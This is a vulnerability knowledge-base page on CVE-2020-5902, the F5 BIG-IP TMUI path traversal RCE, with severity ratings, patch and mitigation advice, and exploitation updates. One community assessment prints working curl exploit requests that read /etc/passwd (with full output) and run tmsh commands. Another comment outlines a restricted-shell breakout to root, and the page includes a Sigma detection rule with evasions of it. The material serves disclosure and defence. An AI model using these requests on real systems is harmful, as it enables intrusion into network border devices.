Attacker Value
Very High
(8 users assessed)
Exploitability
Very High
(8 users assessed)
User Interaction
None
Privileges Required
None
Attack Vector
Network
16

CVE-2020-5902 — TMUI RCE vulnerability

Disclosure Date: July 01, 2020
Exploited in the Wild
Add MITRE ATT&CK tactics and techniques that apply to this CVE.

Description

In BIG-IP versions 15.0.0-15.1.0.3, 14.1.0-14.1.2.5, 13.1.0-13.1.3.3, 12.1.0-12.1.5.1, and 11.6.1-11.6.5.1, the Traffic Management User Interface (TMUI), also referred to as the Configuration utility, has a Remote Code Execution (RCE) vulnerability in undisclosed pages.

Add Assessment

6
Ratings
Technical Analysis

Overview

This one is Critical to patch quickly with a CVSS Score of 10.

If an attacker can gain access to the TMUI Configuration utility port they can gain unauthenticated Remote Code Execution. All version of Big IP from 11.x through 15.x are vulnerable.

Patch & Mitigation

Patches are out but F5 have also listed a set of Mitigation techniques to reduce the attack surface. This takes it from Unathenticated RCE to Authenticated RCE, Which is still bad.

Refer to the F5 Article for details. – https://support.f5.com/csp/article/K52145254

Cloud Services

If you are using AWS, Azure, GCP cloud images Check the version number is fully patched against the correct version numbers.

  • At the time of Writing AWS MarketPlace version is 15.1.0.2-0.0.9

In the wild POC

Within 24 hours this has been exploited in the wild with simple to replicate Proof Of Concepts.

Core Vulnerability.

The core of this vulnerability lies in a path traversal that leads to auth bypass. With this you can use built in functions to gain file read / write or you can access the web based shell to create accounts with shell access.

Here are some redacted examples. The redaction will be removed once more details are public.
Enough information is now public that I am removing the redaction. The following examples show:

  • File read
  • File Write
  • tmsh access
curl --insecure  'https://f5-bigip.home.lab:8443/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd'


{"output":"root:x:0:0:root:\/root:\/sbin\/nologin\nbin:x:1:1:bin:\/bin:\/sbin\/nologin\ndaemon:x:2:2:daemon:\/sbin:\/sbin\/nologin\nadm:x:3:4:adm:\/var\/adm:\/sbin\/nologin\nlp:x:4:7:lp:\/var\/spool\/lpd:\/sbin\/nologin\nmail:x:8:12:mail:\/var\/spool\/mail:\/sbin\/nologin\noperator:x:11:0:operator:\/root:\/sbin\/nologin\nnobody:x:99:99:Nobody:\/:\/sbin\/nologin\ntmshnobody:x:32765:32765:tmshnobody:\/:\/sbin\/nologin\nadmin:x:0:500:Admin User:\/home\/admin:\/bin\/bash\nvcsa:x:69:69:virtual console memory owner:\/dev:\/sbin\/nologin\ndbus:x:81:81:System message bus:\/:\/sbin\/nologin\nsystemd-bus-proxy:x:974:998:systemd Bus Proxy:\/:\/sbin\/nologin\nsystemd-network:x:192:192:systemd Network Management:\/:\/sbin\/nologin\npolkitd:x:27:27:User for polkitd:\/:\/sbin\/nologin\nnslcd:x:65:55:LDAP Client User:\/:\/sbin\/nologin\ntss:x:59:59:Account used by the trousers package to sandbox the tcsd daemon:\/dev\/null:\/sbin\/nologin\npostgres:x:26:26:PostgreSQL Server:\/var\/local\/pgsql\/data:\/sbin\/nologin\ntomcat:x:91:91:Apache Tomcat:\/usr\/share\/tomcat:\/sbin\/nologin\nhsqldb:x:96:96::\/var\/lib\/hsqldb:\/sbin\/nologin\nsshd:x:74:74:Privilege-separated SSH:\/var\/empty\/sshd:\/sbin\/nologin\nrpc:x:32:32:Rpcbind Daemon:\/var\/lib\/rpcbind:\/sbin\/nologin\nntp:x:38:38::\/etc\/ntp:\/sbin\/nologin\nf5_remoteuser:x:499:499:f5 remote user account:\/home\/f5_remoteuser:\/sbin\/nologin\ntcpdump:x:72:72::\/:\/sbin\/nologin\noprofile:x:16:16:Special user account to be used by OProfile:\/:\/sbin\/nologin\nsdm:x:191:996:sdmuser:\/var\/sdm:\/bin\/false\nnamed:x:25:25:Named:\/var\/named:\/bin\/false\napache:x:48:48:Apache:\/usr\/local\/www:\/sbin\/nologin\nsyscheck:x:199:10::\/:\/sbin\/nologin\nmysql:x:98:98:MySQL server:\/var\/lib\/mysql:\/sbin\/nologin\nrestnoded:x:198:198::\/:\/sbin\/nologin\nGuest:x:16110:500:Guest:\/home\/Guest:\/sbin\/nologin\n"}%           

This doesn’t only affect the login.jsp path it can be used from anywhere.

curl --insecure  'https://f5-bigip.home.lab:8443/tmui/tmui/login/welcome.jsp/..;/..;/locallb/workspace/fileRead.jsp?fileName=/etc/passwd' 


{"output":"root:x:0:0:root:\/root:\/sbin\/nologin\nbin:x:1:1:bin:\/bin:\/sbin\/nologin\ndaemon:x:2:2:daemon:\/sbin:\/sbin\/nologin\nadm:x:3:4:adm:\/var\/adm:\/sbin\/nologin\nlp:x:4:7:lp:\/var\/spool\/lpd:\/sbin\/nologin\nmail:x:8:12:mail:\/var\/spool\/mail:\/sbin\/nologin\noperator:x:11:0:operator:\/root:\/sbin\/nologin\nnobody:x:99:99:Nobody:\/:\/sbin\/nologin\ntmshnobody:x:32765:32765:tmshnobody:\/:\/sbin\/nologin\nadmin:x:0:500:Admin User:\/home\/admin:\/bin\/bash\nvcsa:x:69:69:virtual console memory owner:\/dev:\/sbin\/nologin\ndbus:x:81:81:System message bus:\/:\/sbin\/nologin\nsystemd-bus-proxy:x:974:998:systemd Bus Proxy:\/:\/sbin\/nologin\nsystemd-network:x:192:192:systemd Network Management:\/:\/sbin\/nologin\npolkitd:x:27:27:User for polkitd:\/:\/sbin\/nologin\nnslcd:x:65:55:LDAP Client User:\/:\/sbin\/nologin\ntss:x:59:59:Account used by the trousers package to sandbox the tcsd daemon:\/dev\/null:\/sbin\/nologin\npostgres:x:26:26:PostgreSQL Server:\/var\/local\/pgsql\/data:\/sbin\/nologin\ntomcat:x:91:91:Apache Tomcat:\/usr\/share\/tomcat:\/sbin\/nologin\nhsqldb:x:96:96::\/var\/lib\/hsqldb:\/sbin\/nologin\nsshd:x:74:74:Privilege-separated SSH:\/var\/empty\/sshd:\/sbin\/nologin\nrpc:x:32:32:Rpcbind Daemon:\/var\/lib\/rpcbind:\/sbin\/nologin\nntp:x:38:38::\/etc\/ntp:\/sbin\/nologin\nf5_remoteuser:x:499:499:f5 remote user account:\/home\/f5_remoteuser:\/sbin\/nologin\ntcpdump:x:72:72::\/:\/sbin\/nologin\noprofile:x:16:16:Special user account to be used by OProfile:\/:\/sbin\/nologin\nsdm:x:191:996:sdmuser:\/var\/sdm:\/bin\/false\nnamed:x:25:25:Named:\/var\/named:\/bin\/false\napache:x:48:48:Apache:\/usr\/local\/www:\/sbin\/nologin\nsyscheck:x:199:10::\/:\/sbin\/nologin\nmysql:x:98:98:MySQL server:\/var\/lib\/mysql:\/sbin\/nologin\nrestnoded:x:198:198::\/:\/sbin\/nologin\nGuest:x:16110:500:Guest:\/home\/Guest:\/sbin\/nologin\n"}
curl --insecure  'https://f5-bigip.home.lab:8443/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin'
4
Ratings
  • Attacker Value
    Very High
Technical Analysis

There have been several reports of exploitation in the wild as of July 4. The one I’ve seen cited the most is here.

3
Ratings
  • Attacker Value
    Very High
  • Exploitability
    Very High
Technical Analysis

Noticed an initial script from @RootUp that looks handy for scanning environments: https://raw.githubusercontent.com/RootUp/PersonalStuff/master/http-vuln-cve2020-5902.nse

This script may be better with fewer false-positives according to here :
https://github.com/rwincey/CVE-2020-5902-NSE/blob/master/http-f5-tmui-path-traversal.nse

Note that these scripts actively exploit the vuln, which may not be legal to run without permission, noted by @tsellers-r7 https://twitter.com/TomSellers/status/1280485081908305920

3
Ratings
Technical Analysis

If the exploit fits in a tweet, you know it’s pretty bad lmao

2
Ratings
Technical Analysis

Update July 2021: https://us-cert.cisa.gov/ncas/alerts/aa21-209a notes that this was one of the most commonly exploited vulnerabilities by APT groups in 2020.

Just wanted to add in the fact that is now supposedly being exploited by Chinese State Sponsored actors according to the NSA announcement at https://media.defense.gov/2020/Oct/20/2002519884/-1/-1/0/CSA_CHINESE_EXPLOIT_VULNERABILITIES_UOO179811.PDF

2
Ratings
Technical Analysis

In the most recent vulnerable versions of BIG-IP, accessing TMSH through the TMUI path traversal leads to “RCE” insofar as you can execute management commands in a restricted TMSH environment.

That said, there are a few different ways you can break out of the restricted shell. One method utilizes TMSH’s command alias functionality to map a blocked command to an allowed command. This results in Unix shell access as root.

In either case, privileged access to an F5 BIG-IP device is critical, as these often sit at network borders and even provide SSL termination!

CVSS V3 Severity and Metrics
Base Score:
9.8 Critical
Impact Score:
5.9
Exploitability Score:
3.9
Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Attack Vector (AV):
Network
Attack Complexity (AC):
Low
Privileges Required (PR):
None
User Interaction (UI):
None
Scope (S):
Unchanged
Confidentiality (C):
High
Integrity (I):
High
Availability (A):
High

General Information

Products

  • BIG-IP

References

Additional Info

Technical Analysis

Description: On July 3, F5 Networks announced that its BIG-IP Traffic Management User Interface (TMUI) has a remote code execution vulnerability (CVE-2020-5902) in undisclosed pages. Successful exploitation allows unauthenticated attackers, or authenticated users, with network access to the TMUI, through the BIG-IP management port and/or Self IPs, to execute arbitrary system commands, create or delete files, disable services, and/or execute arbitrary Java code. This vulnerability may result in complete system compromise. See F5’s advisory, which was published June 30, for full details.

CVE-2020-5902 carries a CVSSv3 base score of 10.0 and is known to be actively exploited in the wild as of July 3, 2020. Security researcher Kevin Beaumont also noted on Sunday, July 5 that BIG-IP boxes are being targeted with automated credential scraping, and that organizations whose BIG-IP instances were yet to be upgraded should rotate credentials and examine log data.

Affected products include: BIG-IP (LTM, AAM, AFM, Analytics, APM, ASM, DNS, FPS, GTM, Link Controller, PEM)

Known vulnerable versions:

  • 15.1.0
  • 15.0.0
  • 14.1.0 – 14.1.2
  • 13.1.0 – 13.1.3
  • 12.1.0 – 12.1.5
  • 11.6.1 – 11.6.5

F5’s advisory notes that “the BIG-IP system in Appliance mode is also vulnerable. This issue is not exposed on the data plane; only the control plane is affected.”

Rapid7 analysis: BIG-IP is common in enterprise and high-value environments and makes an extremely attractive attack target even for vulnerabilities with higher barriers to exploitation. CVE-2020-5902 presents no such hurdle for attackers; the vulnerability is easily exploitable and straightforward to weaponize. As of July 5, Rapid7’s vulnerability research and exploit development team has tested multiple attack vectors and was able to achieve unauthenticated remote root code execution with one of them: RCE in this case results from security flaws in multiple components, such as one that allows directory traversal exploitation. Metasploit exploit code that obtains a root shell on vulnerable versions of BIG-IP is here.

Over the weekend, the research community published a widely shared Sigma rule to detect exploitation. The rule is under active revision to account for and mitigate a number of different evasions. Further details are below, but in general defenders should be aware of quickly evolving information about mitigation and detection bypasses. Defenders can mitigate the risk of evasions by modifying monitoring processes to alert on unique components (e.g., ..;, tmui) and setting more precise matching rules.

Originally, the Sigma rule checked for a base path, /tmui/login, like so:

detection:
   selection_base:
       c-uri|contains: '/tmui/login'
   selection_traversal:
       c-uri|contains:
           - '..;/'
           - '.jsp/..'
   condition: selection_base and selection_traversal

This means the path must contain /tmui/login as a prerequisite, then either ..;/ or .jsp/... Rapid7 researchers verified as of July 7, 2020 that it was possible for attackers to circumvent the rule—for instance by modifying the login path to /tmui/./login, where . means current directory (/tmui). In general, path normalization works against detection rules here, i.e., in that the addition of . is normalized to /tmui/login. As of July 8, this evasion has since been mitigated by updates to the Sigma rule. However, Metasploit researchers have tested further evasions that, for instance, break selection_traversal instead of selection_base. Our guidance for defenders remains the same—alerting on unique components and setting precise matching rules is recommended as an overarching strategy regardless of the particulars of each new evasion.

Guidance:
F5 Networks customers running affected products should upgrade to a non-vulnerable version as quickly as possible. If you are unable to patch, F5 lists a number of mitigation options with detailed instructions in the Security Advisory Recommended Actions section of their advisory. In general, organizations should avoid exposing management interfaces to the public internet.

Update August 4, 2020: AlienVault and Trend Micro research has said this week that a Mirai botnet exploit has been weaponized to attack IoT devices via CVE-2020-5902. Per Trend Micro’s report, “a Mirai botnet downloader (detected by Trend Micro as Trojan.SH.MIRAI.BOI) can be added to new malware variants to scan for exposed Big-IP boxes for intrusion and deliver the malicious payload.”

Update July 13, 2020: Researchers have strongly emphasized that patching is far preferred to applying mitigations. The mitigation bypass shared last week has been detected in the wild since at least July 7. Further information from F5 Networks is below, but organizations that were unable to patch and instead applied the mitigation should assess their systems for compromise and patch as soon as possible.

Update July 8, 2020: The F5 Networks communication below advises BIG-IP customers who were unable to patch that their previously suggested mitigation is able to be circumvented.

“The Security Advisory for this CVE contained a suggested mitigation, for those unable to upgrade immediately, which was believed to prevent unauthenticated attackers from exploiting the vulnerability. Today F5 received new information, which indicated there was a method for attackers to circumvent the mitigation and compromise an unpatched system.

A new mitigation has been developed, and an updated Security Advisory has been published: K52145254: TMUI RCE vulnerability CVE-2020-5902. F5 recommends applying this new mitigation to all systems which have not yet been upgraded to a patched release, including those systems which were previously mitigated.”

As community reports have indicated both active exploitation of CVE-2020-5902 and automated credential scraping, BIG-IP customers should also strongly consider changing credentials and examining their logs for unusual activity. Organizations should assess whether their individual risk models warrant further incident response or other compromise investigation.